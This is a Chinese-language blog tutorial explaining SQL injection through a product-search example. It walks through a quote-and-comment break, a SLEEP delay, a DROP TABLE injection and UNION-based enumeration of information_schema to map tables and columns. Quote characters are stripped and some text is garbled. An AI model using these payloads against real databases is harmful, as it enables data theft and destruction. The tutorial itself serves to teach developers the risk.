sql注入基本原理是什么

58次阅读
没有评论

共计 2350 个字符,预计需要花费 6 分钟才能阅读完成。

自动写代码机器人,免费开通

这篇文章主要介绍了 sql 注入基本原理是什么,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让丸趣 TV 小编带着大家一起了解一下。

SQL 注入基本原理

WEB 技术发展日新月异,但是徒手拼 SQL 的传统手艺还是受相当多的开发者亲睐。毕竟相比于再去学习一套复杂的 ORM 规则,手拼更说方便,直观。通常自己拼 SQL 的人,应该是有听说过 SQL 注入很危险,但是总是心想:我的 SQL 语句这么简单,不可能被注入的。

花 5 分钟看完这个完整的例子,从今往后应该再也不敢有以上侥幸心理了。

简单场景

有一个 WEB 界面提供输入商品名称,展示对应价格,生产日期及生产地信息。例如输入 Hammer 展示:

产品价格生产地生产日期 Claw Hammer12.98American2019.11.07Club Hammer29.98Canada2019.11.11

我们跳过了搭建 Web 搜索界面的过程,直接关注重点部分: SQL 注入。

如果要实现以上功能,那么我们大致可以猜到服务器使用的 SQL 语句如下:

SELECT ? FROM ? WHERE ? LIKE  %Hammer%

其中? 表示目前我们并不知道具体的表名和字段名,此 SQL 唯一可以被操纵的就是单引号里面的输入内容 %Hammer%。假如我们直接在查找框里输入一个单引号。即变成

select ? from ? where ? Like  % %

这样拼接后造成 SQL 语法错误,得不到任何结果,我们需要使用 – 来把最后一个单引号注释掉。

select ? from ? where ? Like  %  -- %

– 后的是注释内容(你也可以用 #),这样你可以得到所有的产品信息,目前为止,还是没有嗅到危险的信号。

产品价格生产地生产日期 Claw Hammer12.98American2019.11.07Club Hammer29.98Canada2019.11.11Paring Knife10.98China2019.11.11Boning Knife19.98China2019.01.01

小试牛刀 and

紧紧抓住上一步中可以扩展的单引号部分。来一个简单的延时语句试一试:

select ? from ? where ? Like  %Hammer%  and 1 = SLEEP(2); -- %

这时查询会 2 秒后才返回结果,如果把时间延长,用脚本多点几次查询,一下就能把数据库的连接池用完。

当然,还有破坏力更强的!

select ? from ? where ? Like  %Hammer%  drop table xxxx; -- %

可以直接把表 / 数据库直接删除掉,至于如何知道引数据库中有哪一些表 (即如何确定上句 SQL 中的 xxxx) 呢?

为所欲为 union

我们需要知道此数据库有哪一些表!这样才能能拿到有用的信息。

使用 union 可以把不同表的内容拼在一起,小试一下:

select ?,?,?,? from ? where ? Like  %Hammer%  UNION (select 1,2,3,4 from dual); -- %

产品价格生产地生产日期 Claw Hammer12.98American2019.11.07Club Hammer29.98Canada2019.11.111234

可以看到我们把假数据 1,2,3,4 成功地拼接到搜索结果中。

Mysql 系统自带的信息都存在 information_schema 数据库中。我们试着在里面找找有用的信息。

select ? from ? where ? Like  %Hammer%  UNION (select TABLE_NAME,TABLE_SCHEMA,3,4 from information_schema.tables); -- %

产品价格生产地生产日期 Claw Hammer12.98American2019.11.07Club Hammer29.98Canada2019.11.11authorshawkeye34productshawkeye34userhawkeye34……..34

现在知道了这些数据库名和表名,所有人都对它为所欲为了!(包括上面执行的 DROP)。

看着列表一猜就能知道我们目前查的是 products 表,接下来我们再把 products 具体的字段也挖出来。

select ? from ? where ? Like  %Hammer%  UNION (select COLUMN_NAME,TABLE_SCHEMA,3,4 from imformation_schema.columns where table_name =  products  -- %

产品价格生产地生产日期 Claw Hammer12.98American2019.11.07Club Hammer29.98Canada2019.11.11idhawkeye34namehawkeye34pricehawkeye34addresshawkeye34updated_athawkeye34

所以,通过上面 2 步,我们知道了表名和字段名,那么查询 API 的完整 SQL 应该是(把上面的? 都补全啦):

select name,price,address,updated_at from products where name like  %Hammer%

通过不断重复以上几个步骤,你就可以通过这一个小小的入口把数据库的所有信息(比如上面发现的 user 表

感谢你能够认真阅读完这篇文章,希望丸趣 TV 小编分享的“sql 注入基本原理是什么”这篇文章对大家有帮助,同时也希望大家多多支持丸趣 TV,关注丸趣 TV 行业资讯频道,更多相关知识等着你来学习!

向 AI 问一下细节

正文完
 
丸趣
版权声明:本站原创文章,由 丸趣 2023-12-16发表,共计2350字。
转载说明:除特殊说明外本站除技术相关以外文章皆由网络搜集发布,转载请注明出处。
评论(没有评论)